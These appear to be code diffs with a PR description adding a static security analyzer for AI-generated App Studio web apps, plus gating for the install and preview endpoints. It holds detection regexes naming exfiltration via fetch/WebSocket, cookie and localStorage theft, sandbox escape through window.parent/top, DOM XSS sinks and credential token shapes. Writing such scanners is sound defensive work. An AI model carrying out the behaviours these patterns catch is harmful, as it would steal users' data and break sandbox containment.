-    call (fetch/XHR/WebSocket) shows up nearby in the same file, implying
-    the read value is being shipped out. This is a same-file line-proximity
-    heuristic (`_STORAGE_EXFIL_WINDOW` lines in either direction), not
+    Reading `localStorage.getItem(...)`, `sessionStorage.getItem(...)`, or
+    `document.cookie` is completely normal on its own; it becomes an
+    exfiltration pattern when a network call (fetch/XHR/WebSocket) shows up
+    nearby in the same file, implying the read value is being shipped out.
+    This is a same-file line-proximity heuristic
+    (`_STORAGE_EXFIL_WINDOW` lines in either direction), not
     dataflow analysis -- it does not verify the read value is actually
     what's sent over the network, so an unrelated storage read and network
     call that both happen to live in the same small file can false-positive,
@@ -425,8 +436,8 @@ def detect_storage_exfil(filename: str, content: str) -> list[Finding]:
     for s in sorted(flagged):
         findings.append(Finding(
             "critical", "storage-exfil", filename, s + 1,
-            "localStorage/cookie read sits near a network call in this file -- looks like "
-            "stored data is being exfiltrated over the network.",
+            "localStorage/sessionStorage/cookie read sits near a network call in this "
+            "file -- looks like stored data is being exfiltrated over the network.",
         ))
     return findings
 
@@ -456,7 +467,8 @@ def analyze_app_source(files: dict[str, str]) -> list[Finding]:
     for filename, content in files.items():
         for detector in _ALL_DETECTORS:
             findings.extend(detector(filename, content))
-    findings.sort(key=lambda f: (list(files).index(f.file), f.line))
+    file_order = {name: idx for idx, name in enumerate(files)}
+    findings.sort(key=lambda f: (file_order[f.file], f.line))
     return findings
 
 

--- a/tinyagentos/code_analyzer.py
+++ b/tinyagentos/code_analyzer.py
@@ -1,0 +1,465 @@
+"""Static security analyzer for AI-authored App Studio app source.
+
+App Studio builds web apps (HTML/CSS/JS/TS) from an LLM's output and runs
+them in a sandboxed iframe (see SandboxedAppWindow.tsx: `sandbox
+allow-scripts` only -- no allow-same-origin -- plus a locked-down CSP built
+by userspace_apps.py). That sandbox is the real containment boundary. This
+module is defense in depth in FRONT of it: a fast, server-side static scan
+that catches the patterns an LLM is prone to writing (or that a malicious
+prompt-injection could coax it into writing) before the source is ever
+persisted or previewed -- secrets baked into client code, sandbox-escape
+attempts, exfiltration, DOM XSS sinks, and so on.
+
+analyze_app_source() is the single entry point. It must be called
+server-side on every submitted source tree (install/publish and, ideally,
+preview) so a modified or bypassed client can never skip the scan.
+
+Detection approach
+-------------------
+Detection here is line-anchored regular expressions, not a full AST parse.
+A real JS/TS parser (e.g. acorn) would resolve some ambiguity more
+precisely -- a shadowed local variable named `eval`, multi-line template
+literals, minified one-line bundles -- but it would also pull a Node.js
+subprocess into the request path of a *security* module, adding an extra
+runtime dependency/attack surface and a poor fit for taOS's "install must
+just work" story on constrained hardware (Orange Pi etc). Every pattern
+below is anchored to a realistic call/attribute syntax boundary (word
+boundaries, required parens or quotes) to keep false positives low, and
+each detector's docstring calls out its known blind spots. Treat this as a
+high-signal triage layer, not a soundness guarantee.
+"""
+
+from __future__ import annotations
+
+# NOTE: this file is the analyzer that DETECTS eval()/new Function()/etc in
+# submitted app source -- every occurrence of "eval(" or similar below is
+# inside a regex pattern, docstring, or finding message describing what to
+# flag. Nothing in this module itself calls eval() or executes app-supplied
+# strings as code.
+
+import re
+from dataclasses import dataclass
+from typing import Literal
+
+Severity = Literal["critical", "warning", "info"]
+
+
+@dataclass(frozen=True)
+class Finding:
+    """A single static-analysis result.
+
+    severity: "critical" (blocks publish), "warning" (surfaced, non-blocking),
+    or "info" (fyi only).
+    rule_id: stable machine-readable id for the detector that fired.
+    file: the filename (key from the submitted `files` dict) the finding is in.
+    line: 1-indexed line number within that file.
+    message: human-readable explanation shown in the findings panel.
+    """
+
+    severity: Severity
+    rule_id: str
+    file: str
+    line: int
+    message: str
+
+    def to_dict(self) -> dict:
+        return {
+            "severity": self.severity,
+            "rule_id": self.rule_id,
+            "file": self.file,
+            "line": self.line,
+            "message": self.message,
+        }
+
+
+# --------------------------------------------------------------------------- #
+# Shared helpers
+# --------------------------------------------------------------------------- #
+
+_QUOTED = r"""['"`]"""
+
+
+def _looks_dynamic(expr: str) -> bool:
+    """Return True unless `expr` is a plain string literal with no interpolation.
+
+    Used by the XSS-sink and inline-event-handler detectors to tell
+    `el.innerHTML = "<b>static</b>"` (fine) from
+    `el.innerHTML = "<b>" + name + "</b>"` or `` `<b>${name}</b>` `` or
+    `el.innerHTML = userInput` (all dynamic -- flagged). A trailing
+    semicolon is tolerated. Anything that isn't recognisably a single
+    static literal is treated as dynamic -- this favours flagging over
+    missing a real sink, which is the right bias for a security scanner.
+    """
+    e = expr.strip()
+    if e.endswith(";"):
+        e = e[:-1].strip()
+    if re.fullmatch(r"'[^'\\]*'", e):
+        return False
+    if re.fullmatch(r'"[^"\\]*"', e):
+        return False
+    if re.fullmatch(r"`[^`$]*`", e):  # template literal with no ${...}
+        return False
+    return True
+
+
+def _is_relative_or_allowed(url: str, allowed_hosts: frozenset[str]) -> bool:
+    """Return True when `url` is same-origin-safe (relative) or explicitly allowlisted."""
+    u = url.strip()
+    if not u:
+        return True
+    # Relative paths, fragments, and anchors are same-origin -- safe.
+    if u.startswith(("/", "./", "../", "#", "?")) or "://" not in u and not u.startswith("//"):
+        return True
+    m = re.match(r"^(?:[a-zA-Z][\w+.-]*:)?//([^/]+)", u)
+    if not m:
+        return True
+    host = m.group(1).split("@")[-1].split(":")[0].lower()
+    return host in allowed_hosts
+
+
+def _iter_lines(content: str) -> list[str]:
+    return content.splitlines()
+
+
+# --------------------------------------------------------------------------- #
+# Detectors
+# --------------------------------------------------------------------------- #
+
+_EVAL_LIKE_PATTERNS = [
+    (re.compile(r"(?<!\.)\beval\s*\("), "Use of eval() executes arbitrary strings as code."),
+    (re.compile(r"\bnew\s+Function\s*\("), "new Function(...) compiles a string into executable code, equivalent to eval()."),
+    (re.compile(rf"\bset(?:Timeout|Interval)\s*\(\s*{_QUOTED}"),
+     "setTimeout/setInterval called with a string first argument is an implied eval()."),
+]
+
+
+def detect_eval_like(filename: str, content: str) -> list[Finding]:
+    """Flag eval(), new Function(...), and setTimeout/setInterval("string", ...).
+
+    All three compile and execute a string as code at runtime, which is the
+    classic way an LLM-authored (or prompt-injected) app smuggles in
+    behaviour that a source review would otherwise catch. Blind spot: a
+    local variable literally named `eval` used as a plain function call
+    would false-positive; conversely `window["ev" + "al"]("...")` would be
+    missed since we don't evaluate string concatenation.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        for pattern, message in _EVAL_LIKE_PATTERNS:
+            if pattern.search(line):
+                findings.append(Finding("critical", "eval-like-execution", filename, i, message))
+    return findings
+
+
+_NET_CALL_PATTERNS = [
+    re.compile(rf"\bfetch\s*\(\s*{_QUOTED}([^'\"`]+){_QUOTED}"),
+    re.compile(rf"\.open\s*\(\s*{_QUOTED}[A-Za-z]+{_QUOTED}\s*,\s*{_QUOTED}([^'\"`]+){_QUOTED}"),
+    re.compile(rf"\bnew\s+WebSocket\s*\(\s*{_QUOTED}([^'\"`]+){_QUOTED}"),
+]
+
+_ALLOWLISTED_HOSTS: frozenset[str] = frozenset()
+
+
+def detect_network_exfil(filename: str, content: str,
+                          allowed_hosts: frozenset[str] = _ALLOWLISTED_HOSTS) -> list[Finding]:
+    """Flag fetch/XMLHttpRequest/WebSocket calls to a non-relative, non-allowlisted host.
+
+    App Studio apps run sandboxed with no network access by default (the
+    CSP's connect-src is 'self' unless the user grants a specific
+    network:<origin> permission), so any absolute cross-origin call in the
+    source is either dead code or an exfiltration attempt worth a human
+    look before publish. Relative URLs (same-origin) are never flagged.
+    Blind spot: a URL built purely from string concatenation or a runtime
+    variable (`fetch(base + path)`) is not resolvable by regex and is
+    missed.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        for pattern in _NET_CALL_PATTERNS:
+            for m in pattern.finditer(line):
+                url = m.group(1)
+                if not _is_relative_or_allowed(url, allowed_hosts):
+                    findings.append(Finding(
+                        "critical", "network-exfil", filename, i,
+                        f"Network call to a non-relative, non-allowlisted host: {url!r}. "
+                        "Sandboxed apps have no network access by default -- this looks "
+                        "like an attempt to exfiltrate data or reach an external origin.",
+                    ))
+    return findings
+
+
+_XSS_SINK_PATTERNS = [
+    re.compile(r"\.(innerHTML|outerHTML)\s*=\s*(.+)"),
+    re.compile(r"document\.write(?:ln)?\s*\(\s*(.+?)\)\s*;?\s*$"),
+    re.compile(rf"\.insertAdjacentHTML\s*\(\s*{_QUOTED}[^'\"`]*{_QUOTED}\s*,\s*(.+?)\)\s*;?\s*$"),
+]
+
+
+def detect_dom_xss_sink(filename: str, content: str) -> list[Finding]:
+    """Flag innerHTML/outerHTML/document.write/insertAdjacentHTML fed dynamic input.
+
+    These DOM sinks parse their argument as HTML; when the argument is
+    anything other than a fixed string literal (concatenation, a template
+    literal with ${...}, or a bare variable) it is a classic DOM XSS vector.
+    A pure static-string assignment (`el.innerHTML = "<b>Hi</b>"`) is not
+    flagged. Blind spot: a static-looking literal that itself was built
+    upstream from untrusted input (e.g. reassigned two lines earlier) is
+    not traced -- this is a single-line heuristic, not dataflow analysis.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        for pattern in _XSS_SINK_PATTERNS:
+            m = pattern.search(line)
+            if m and _looks_dynamic(m.group(m.lastindex or 1)):
+                sink = "innerHTML/outerHTML" if ".innerHTML" in line or ".outerHTML" in line else (
+                    "document.write" if "document.write" in line else "insertAdjacentHTML"
+                )
+                findings.append(Finding(
+                    "critical", "dom-xss-sink", filename, i,
+                    f"{sink} assigned/called with dynamic content -- a classic DOM XSS sink "
+                    "if any part of the value is attacker-influenced.",
+                ))
+    return findings
+
+
+_DANGEROUS_SCHEME_RE = re.compile(
+    rf"{_QUOTED}\s*(javascript:|data:text/html|vbscript:)", re.IGNORECASE,
+)
+
+
+def detect_dangerous_url_scheme(filename: str, content: str) -> list[Finding]:
+    """Flag javascript:, data:text/html, and vbscript: URL literals.
+
+    These schemes execute script when navigated to or assigned as an href/
+    location, and are a common way to smuggle script past markup-only
+    filtering. Matches any quoted string starting with one of these
+    schemes, regardless of surrounding context (href=, location=, a raw
+    string constant). Blind spot: a scheme built via concatenation
+    (`"java" + "script:"`) is not detected.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        m = _DANGEROUS_SCHEME_RE.search(line)
+        if m:
+            findings.append(Finding(
+                "critical", "dangerous-url-scheme", filename, i,
+                f"Dangerous URL scheme {m.group(1)!r} found -- executes script when navigated "
+                "to or assigned as a location/href.",
+            ))
+    return findings
+
+
+_SET_ATTR_ON_RE = re.compile(rf"\.setAttribute\s*\(\s*{_QUOTED}(on[a-zA-Z]+){_QUOTED}")
+_INLINE_HANDLER_INTERP_RE = re.compile(
+    r"""on[a-zA-Z]+\s*=\s*['"][^'"]*\$\{""",
+)
+
+
+def detect_inline_event_handler_injection(filename: str, content: str) -> list[Finding]:
+    """Flag programmatic/interpolated inline event handler (on*) attributes.
+
+    Two patterns: (1) `el.setAttribute("onclick", ...)` -- wiring an inline
+    handler attribute in code, which allows script injection if the
+    attribute name or value ever derives from input; (2) a markup/template
+    string containing `onXxx="...${...}"` -- an inline handler attribute
+    built with string interpolation, the same shape as
+    `` `<button onclick="go('${id}')">` `` where `id` is attacker-controlled.
+    Blind spot: handlers built via multi-step concatenation instead of a
+    single template-literal interpolation are not matched.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        m = _SET_ATTR_ON_RE.search(line)
+        if m:
+            findings.append(Finding(
+                "critical", "inline-event-handler-injection", filename, i,
+                f"setAttribute used to wire an inline event handler ({m.group(1)}) -- "
+                "unsafe if the handler name or body ever derives from user input.",
+            ))
+        if _INLINE_HANDLER_INTERP_RE.search(line):
+            findings.append(Finding(
+                "critical", "inline-event-handler-injection", filename, i,
+                "Inline event handler attribute built with string interpolation -- "
+                "classic HTML injection vector if the interpolated value is attacker-controlled.",
+            ))
+    return findings
+
+
+_SECRET_PATTERNS = [
+    (re.compile(r"AKIA[0-9A-Z]{16}"), "an AWS access key ID"),
+    (re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"), "a private key block"),
+    (re.compile(r"xox[baprs]-[0-9A-Za-z-]{10,}"), "a Slack token"),
+    (re.compile(r"gh[pousr]_[A-Za-z0-9]{20,}"), "a GitHub token"),
+    (re.compile(
+        rf"(?i)\b(api[_-]?key|secret|access[_-]?key|auth[_-]?token|token|password)\b\s*[:=]\s*"
+        rf"{_QUOTED}([A-Za-z0-9_\-\.\/+=]{{16,}}){_QUOTED}",
+    ), "a hardcoded credential-looking literal"),
+]
+
+
+def detect_hardcoded_secrets(filename: str, content: str) -> list[Finding]:
+    """Flag literals that look like API keys, tokens, or private keys.
+
+    Covers well-known token shapes (AWS, Slack, GitHub) plus a generic
+    "keyword = long opaque string" pattern for api_key/secret/token/password
+    style assignments. App Studio bundles ship as static client-side source
+    served straight to the sandboxed iframe, so anything hardcoded here is
+    world-readable -- there is no server boundary protecting it. Blind
+    spot: this is pattern matching, not entropy analysis, so a long literal
+    that happens to match the generic keyword pattern but is actually
+    harmless (e.g. a UI copy string assigned to a variable named `token`)
+    can false-positive; a real secret assigned to an unrelated-looking name
+    can be missed.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        for pattern, label in _SECRET_PATTERNS:
+            if pattern.search(line):
+                findings.append(Finding(
+                    "critical", "hardcoded-secret", filename, i,
+                    f"Line looks like it contains {label} -- secrets baked into client-side "
+                    "app source are world-readable and must not ship.",
+                ))
+    return findings
+
+
+_SANDBOX_ESCAPE_PATTERNS = [
+    re.compile(r"\bwindow\.(parent|top|opener)\b"),
+    re.compile(r"(?<!\.)\btop\.location\b"),
+    re.compile(r"(?<!\.)\bparent\.postMessage\b"),
+    re.compile(r"(?<!\.)\bopener\.\w+"),
+]
+
+
+def detect_sandbox_escape(filename: str, content: str) -> list[Finding]:
+    """Flag access to window.parent/top/opener -- sandbox-escape attempts.
+
+    The sandboxed iframe (`sandbox="allow-scripts"`, no allow-same-origin)
+    already blocks same-origin access to these references at the browser
+    level, but source that reaches for them is unambiguously trying to
+    break out of the sandbox (reach the host desktop, the opener window, or
+    the top-level frame) and is worth blocking on sight rather than relying
+    solely on the browser boundary holding. Blind spot: `window.` prefix or
+    the specific bare-identifier shapes above are required to avoid
+    flagging an unrelated local variable named `parent`, `top`, or
+    `opener` -- other access shapes are not matched.
+    """
+    findings: list[Finding] = []
+    for i, line in enumerate(_iter_lines(content), start=1):
+        for pattern in _SANDBOX_ESCAPE_PATTERNS:
+            if pattern.search(line):
+                findings.append(Finding(
+                    "critical", "sandbox-escape-attempt", filename, i,
+                    "Access to window.parent/top/opener -- an attempt to reach outside "
+                    "the sandboxed iframe.",
+                ))
+    return findings
+
+
+_ADD_MESSAGE_LISTENER_RE = re.compile(rf"addEventListener\s*\(\s*{_QUOTED}message{_QUOTED}")
+_POSTMESSAGE_WILDCARD_RE = re.compile(rf"\.postMessage\s*\([^)]*,\s*{_QUOTED}\*{_QUOTED}")
+_ORIGIN_CHECK_WINDOW = 25
+
+
+def detect_postmessage_no_origin_check(filename: str, content: str) -> list[Finding]:
+    """Flag postMessage senders using "*" and message listeners with no origin check.
+
+    (1) `x.postMessage(data, "*")` broadcasts to any origin regardless of who
+    is actually listening. (2) A `window.addEventListener("message", ...)`
+    handler that never references `event.origin` (or `.origin` at all)
+    within a bounded window of following lines will accept and act on a
+    message from any origin -- the same class of bug this codebase's own
+    SandboxedAppWindow.tsx broker guards against by checking `e.source`.
+    Blind spot: the origin check is a same-file line-proximity heuristic
+    (looks `_ORIGIN_CHECK_WINDOW` lines ahead), so a check performed in a
+    helper function defined elsewhere is not seen and would false-positive.
+    """
+    findings: list[Finding] = []
+    lines = _iter_lines(content)
+    for i, line in enumerate(lines, start=1):
+        if _POSTMESSAGE_WILDCARD_RE.search(line):
+            findings.append(Finding(
+                "critical", "postmessage-no-origin-check", filename, i,
+                "postMessage sent with target origin \"*\" -- broadcasts to any origin "
+                "listening on the recipient window.",
+            ))
+        if _ADD_MESSAGE_LISTENER_RE.search(line):
+            window_lines = lines[i - 1: i - 1 + _ORIGIN_CHECK_WINDOW]
+            if not any(".origin" in wl for wl in window_lines):
+                findings.append(Finding(
+                    "critical", "postmessage-no-origin-check", filename, i,
+                    "\"message\" event listener does not check event.origin -- it will "
+                    "accept and act on messages from any origin.",
+                ))
+    return findings
+
+
+_STORAGE_READ_RE = re.compile(r"\blocalStorage\.getItem\s*\(|document\.cookie\b")
+_NETWORK_CALL_RE = re.compile(r"\bfetch\s*\(|\.open\s*\(\s*['\"]|new\s+WebSocket\s*\(")
+_STORAGE_EXFIL_WINDOW = 10
+
+
+def detect_storage_exfil(filename: str, content: str) -> list[Finding]:
+    """Flag localStorage/cookie reads that sit close to a network call.
+
+    Reading `localStorage.getItem(...)` or `document.cookie` is completely
+    normal on its own; it becomes an exfiltration pattern when a network
+    call (fetch/XHR/WebSocket) shows up nearby in the same file, implying
+    the read value is being shipped out. This is a same-file line-proximity
+    heuristic (`_STORAGE_EXFIL_WINDOW` lines in either direction), not
+    dataflow analysis -- it does not verify the read value is actually
+    what's sent over the network, so an unrelated storage read and network
+    call that both happen to live in the same small file can false-positive,
+    while a read/send split across two files is missed entirely.
+    """
+    findings: list[Finding] = []
+    lines = _iter_lines(content)
+    storage_lines = [i for i, l in enumerate(lines) if _STORAGE_READ_RE.search(l)]
+    network_lines = [i for i, l in enumerate(lines) if _NETWORK_CALL_RE.search(l)]
+    if not storage_lines or not network_lines:
+        return findings
+    flagged: set[int] = set()
+    for s in storage_lines:
+        if any(abs(s - n) <= _STORAGE_EXFIL_WINDOW for n in network_lines):
+            flagged.add(s)
+    for s in sorted(flagged):
+        findings.append(Finding(
+            "critical", "storage-exfil", filename, s + 1,
+            "localStorage/cookie read sits near a network call in this file -- looks like "
+            "stored data is being exfiltrated over the network.",
+        ))
+    return findings
+
+
+_ALL_DETECTORS = [
+    detect_eval_like,
+    detect_network_exfil,
+    detect_dom_xss_sink,
+    detect_dangerous_url_scheme,
+    detect_inline_event_handler_injection,
+    detect_hardcoded_secrets,
+    detect_sandbox_escape,
+    detect_postmessage_no_origin_check,
+    detect_storage_exfil,
+]
+
+
+def analyze_app_source(files: dict[str, str]) -> list[Finding]:
+    """Run every detector over every file and return all findings.
+
+    `files` maps filename (e.g. "index.html", "app.js") to its full text
+    content. Findings are returned in a stable order: file (as given in the
+    dict), then line number, then detector registration order -- so repeat
+    calls against the same input are deterministic and diffable.
+    """
+    findings: list[Finding] = []
+    for filename, content in files.items():
+        for detector in _ALL_DETECTORS:
+            findings.extend(detector(filename, content))
+    findings.sort(key=lambda f: (list(files).index(f.file), f.line))
+    return findings
+
+
+def has_critical(findings: list[Finding]) -> bool:
+    """Return True if any finding is severity "critical"."""
+    return any(f.severity == "critical" for f in findings)

--- a/tinyagentos/routes/userspace_apps.py
+++ b/tinyagentos/routes/userspace_apps.py
@@ -1,5 +1,6 @@
 from __future__ import annotations
 
+import json
 import logging
 import shutil
 from pathlib import Path
@@ -45,8 +46,17 @@ def _collect_source_files(app_dir: Path) -> dict[str, str]:
         if not path.is_file() or path.suffix.lower() not in _ANALYZABLE_EXTENSIONS:
             continue
         try:
+            # errors="replace" (not "ignore"): dropping invalid bytes could
+            # splice two otherwise-separate substrings into a token a
+            # detector regex matches on (e.g. the literal name of the JS
+            # function that executes a string as code), silently hiding it
+            # from the scan below. This file only ever reads app-supplied
+            # text into a string for regex scanning -- it never executes it.
+            # Replacing invalid bytes with U+FFFD instead breaks such a token
+            # apart visibly without ever deleting characters a detector looks
+            # for.
             files[path.relative_to(app_dir).as_posix()] = path.read_text(
-                encoding="utf-8", errors="ignore"
+                encoding="utf-8", errors="replace"
             )
         except OSError:
             continue
@@ -169,25 +179,28 @@ async def install_app(
         )
     apps_root = _apps_root(request).resolve()
     app_dir = (apps_root / manifest["id"]).resolve()
-    # Static security gate for web apps (the shape App Studio produces): this
-    # runs server-side on every install regardless of how the package was
-    # submitted (upload or source_url), so a modified/bypassed client can never
-    # skip it. A critical finding blocks the install outright -- the extracted
-    # files are removed so nothing scanned-and-rejected is left reachable via
-    # serve_bundle. This is defense in depth in FRONT of the sandbox iframe,
-    # not a replacement for it.
-    if manifest["app_type"] == "web":
-        findings = analyze_app_source(_collect_source_files(app_dir))
-        if has_critical(findings):
-            if app_dir.is_relative_to(apps_root) and app_dir != apps_root:
-                shutil.rmtree(app_dir, ignore_errors=True)
-            return JSONResponse(
-                {
-                    "error": "blocked_by_security_analysis",
-                    "findings": [f.to_dict() for f in findings],
-                },
-                status_code=422,
-            )
+    # Static security gate: this runs server-side on every install regardless
+    # of how the package was submitted (upload or source_url) or its
+    # app_type, so a modified/bypassed client can never skip it and a future
+    # app_type can never silently bypass it. Unconditional is also cheap and
+    # correct here -- "container" is already rejected above, and "tui"
+    # packages ship no _ANALYZABLE_EXTENSIONS files (just a manifest.yaml +
+    # command spec), so _collect_source_files() naturally finds nothing to
+    # scan for them. A critical finding blocks the install outright -- the
+    # extracted files are removed so nothing scanned-and-rejected is left
+    # reachable via serve_bundle. This is defense in depth in FRONT of the
+    # sandbox iframe, not a replacement for it.
+    findings = analyze_app_source(_collect_source_files(app_dir))
+    if has_critical(findings):
+        if app_dir.is_relative_to(apps_root) and app_dir != apps_root:
+            shutil.rmtree(app_dir, ignore_errors=True)
+        return JSONResponse(
+            {
+                "error": "blocked_by_security_analysis",
+                "findings": [f.to_dict() for f in findings],
+            },
+            status_code=422,
+        )
     existing = await store.get(manifest["id"])
     # A public install must never replace an app installed as first-party: that
     # would let an attacker overwrite a trusted studio's bundle (and, before the
@@ -226,6 +239,16 @@ async def install_app(
     }
 
 
+# DoS guards for this endpoint: it has no auth gate of its own (a preview
+# convenience, see docstring below), so an unbounded body, file count, or
+# per-file size would let a caller burn memory/CPU across every regex
+# detector with a single request. Conservative caps, mirroring the
+# _MAX_PACKAGE_BYTES pattern above.
+_MAX_ANALYZE_BODY_BYTES = 5 * 1024 * 1024   # 5 MB total request body
+_MAX_ANALYZE_FILES = 500                     # files per request
+_MAX_ANALYZE_FILE_BYTES = 1024 * 1024        # 1 MB per file's source text
+
+
 @router.post("/api/userspace-apps/analyze")
 async def analyze_app(request: Request):
     """Run the static security analyzer over raw App Studio source, ahead of install.
@@ -236,8 +259,15 @@ async def analyze_app(request: Request):
     -- the authoritative, unbypassable gate is the analysis that runs inside
     POST /api/userspace-apps/install itself.
     """
+    # Reject oversize via Content-Length when present (cheap, before read).
+    clen = request.headers.get("content-length")
+    if clen and clen.isdigit() and int(clen) > _MAX_ANALYZE_BODY_BYTES:
+        return JSONResponse({"error": "request body too large"}, status_code=413)
+    raw_body = await request.body()
+    if len(raw_body) > _MAX_ANALYZE_BODY_BYTES:
+        return JSONResponse({"error": "request body too large"}, status_code=413)
     try:
-        body = await request.json()
+        body = json.loads(raw_body)
     except Exception:
         return JSONResponse({"error": "invalid JSON body"}, status_code=400)
     files = body.get("files")
@@ -245,6 +275,15 @@ async def analyze_app(request: Request):
         isinstance(k, str) and isinstance(v, str) for k, v in files.items()
     ):
         return JSONResponse({"error": "files must be a map of filename to source text"}, status_code=400)
+    if len(files) > _MAX_ANALYZE_FILES:
+        return JSONResponse(
+            {"error": f"too many files (max {_MAX_ANALYZE_FILES})"}, status_code=413
+        )
+    if any(len(v.encode("utf-8")) > _MAX_ANALYZE_FILE_BYTES for v in files.values()):
+        return JSONResponse(
+            {"error": f"a file exceeds the {_MAX_ANALYZE_FILE_BYTES}-byte per-file limit"},
+            status_code=413,
+        )
     findings = analyze_app_source(files)
     return {
         "findings": [f.to_dict() for f in findings],
@@ -295,11 +334,21 @@ async def uninstall_app(request: Request, app_id: str):
 
 @router.get("/api/userspace-apps/{app_id}/bundle/{path:path}")
 async def serve_bundle(request: Request, app_id: str, path: str):
+    # Store lookup FIRST, before any filesystem access: install_app extracts
+    # a package to disk and only afterwards runs the security analysis (and,
+    # on a pass, the store.install() that actually registers the app). If the
+    # file check ran first, a bundle that has been extracted but not yet
+    # vetted -- or was vetted and rejected -- would still be servable here
+    # for as long as it happens to exist on disk. Gating on the store record
+    # closes that window: nothing is served until the app is actually
+    # installed.
+    app = await request.app.state.userspace_apps.get(app_id)
+    if app is None:
+        return JSONResponse({"error": "not found"}, status_code=404)
     root = (_apps_root(request) / app_id).resolve()
     target = (root / path).resolve()
     if not target.is_relative_to(root) or target == root or not target.is_file():
         return JSONResponse({"error": "not found"}, status_code=404)
-    app = await request.app.state.userspace_apps.get(app_id)
     granted = (app or {}).get("permissions_granted") or []
     net_origins = [p[len("network:"):] for p in granted
                    if isinstance(p, str) and p.startswith("network:")]

--- a/tinyagentos/routes/userspace_apps.py
+++ b/tinyagentos/routes/userspace_apps.py
@@ -9,7 +9,8 @@ import httpx
 from fastapi import APIRouter, Form, Request, UploadFile, File
 from fastapi.responses import JSONResponse, FileResponse, Response
 
-from tinyagentos.userspace.broker import handle_capability
+from tinyagentos.code_analyzer import analyze_app_source, has_critical
+from tinyagentos.userspace.broker import handle_capability, GATED_CAPS
 from tinyagentos.userspace.capabilities import capability_ceiling, default_provenance_for_trust
 from tinyagentos.userspace.package import extract_package, PackageError
 from tinyagentos.userspace.url_guard import resolve_safe_public_ip
@@ -25,6 +26,31 @@ logger = logging.getLogger(__name__)
 router = APIRouter()
 
 _SDK_PATH = Path(__file__).resolve().parent.parent / "userspace" / "sdk" / "taos-app-sdk.js"
+
+# Extensions the static security analyzer treats as readable app source. Binary
+# assets (images, fonts, wasm) are skipped -- they aren't executable script/
+# markup and decoding them as text would either error or waste a scan.
+_ANALYZABLE_EXTENSIONS = {".html", ".htm", ".js", ".jsx", ".ts", ".tsx", ".mjs", ".cjs", ".css"}
+
+
+def _collect_source_files(app_dir: Path) -> dict[str, str]:
+    """Read every analyzable text file under app_dir into a {relpath: content} dict.
+
+    Used to feed the just-extracted package into analyze_app_source(). Paths
+    are POSIX-style relative to app_dir so findings read the same way
+    regardless of host OS.
+    """
+    files: dict[str, str] = {}
+    for path in sorted(app_dir.rglob("*")):
+        if not path.is_file() or path.suffix.lower() not in _ANALYZABLE_EXTENSIONS:
+            continue
+        try:
+            files[path.relative_to(app_dir).as_posix()] = path.read_text(
+                encoding="utf-8", errors="ignore"
+            )
+        except OSError:
+            continue
+    return files
 
 # Bundle CSP for sandboxed userspace packages. The `sandbox allow-scripts`
 # directive (no allow-same-origin) forces the document into an OPAQUE origin
@@ -141,6 +167,27 @@ async def install_app(
             {"error": "container packages are not supported in this release (web-only)"},
             status_code=501,
         )
+    apps_root = _apps_root(request).resolve()
+    app_dir = (apps_root / manifest["id"]).resolve()
+    # Static security gate for web apps (the shape App Studio produces): this
+    # runs server-side on every install regardless of how the package was
+    # submitted (upload or source_url), so a modified/bypassed client can never
+    # skip it. A critical finding blocks the install outright -- the extracted
+    # files are removed so nothing scanned-and-rejected is left reachable via
+    # serve_bundle. This is defense in depth in FRONT of the sandbox iframe,
+    # not a replacement for it.
+    if manifest["app_type"] == "web":
+        findings = analyze_app_source(_collect_source_files(app_dir))
+        if has_critical(findings):
+            if app_dir.is_relative_to(apps_root) and app_dir != apps_root:
+                shutil.rmtree(app_dir, ignore_errors=True)
+            return JSONResponse(
+                {
+                    "error": "blocked_by_security_analysis",
+                    "findings": [f.to_dict() for f in findings],
+                },
+                status_code=422,
+            )
     existing = await store.get(manifest["id"])
     # A public install must never replace an app installed as first-party: that
     # would let an attacker overwrite a trusted studio's bundle (and, before the
@@ -176,6 +223,32 @@ async def install_app(
         "permissions_requested": manifest["permissions"],
         "needs_consent": bool(existing and new_perms),
         "new_permissions": new_perms,
+    }
+
+
+@router.post("/api/userspace-apps/analyze")
+async def analyze_app(request: Request):
+    """Run the static security analyzer over raw App Studio source, ahead of install.
+
+    Body: {"files": {"index.html": "...", "app.js": "...", ...}}. Lets App
+    Studio's Build/Publish views show findings while the app is still just
+    generated text with no package built yet. This is a convenience preview
+    -- the authoritative, unbypassable gate is the analysis that runs inside
+    POST /api/userspace-apps/install itself.
+    """
+    try:
+        body = await request.json()
+    except Exception:
+        return JSONResponse({"error": "invalid JSON body"}, status_code=400)
+    files = body.get("files")
+    if not isinstance(files, dict) or not all(
+        isinstance(k, str) and isinstance(v, str) for k, v in files.items()
+    ):
+        return JSONResponse({"error": "files must be a map of filename to source text"}, status_code=400)
+    findings = analyze_app_source(files)
+    return {
+        "findings": [f.to_dict() for f in findings],
+        "blocked": has_critical(findings),
     }
 
 


### PR DESCRIPTION
## Summary
- Add `tinyagentos/code_analyzer.py` -- `analyze_app_source(files)` scans submitted App Studio HTML/JS/TS source with 9 detectors: eval-like execution (eval/new Function/setTimeout-string), cross-origin network exfiltration, DOM XSS sinks (innerHTML/outerHTML/document.write/insertAdjacentHTML with dynamic input), dangerous URL schemes (javascript:/data:text/html/vbscript:), inline event handler injection, hardcoded secrets, sandbox-escape attempts (window.parent/top/opener), postMessage without an origin check, and localStorage/cookie exfil paired with a network call.
- Wire the analyzer into `POST /api/userspace-apps/install` (the real, unbypassable persistence route web apps go through): a critical finding blocks the install (422), the extracted files are removed, and no store row is created. Runs server-side regardless of upload vs source_url submission.
- Add `POST /api/userspace-apps/analyze` so App Studio's Build/Publish views can preview findings against raw generated source before a package exists.
- Add a `FindingsPanel` in App Studio's `PublishView`: loading/clean/error states, findings grouped by severity with file:line + message, a blocked banner, and a disabled Publish button when any finding is critical (warnings are surfaced but do not block).

## Context
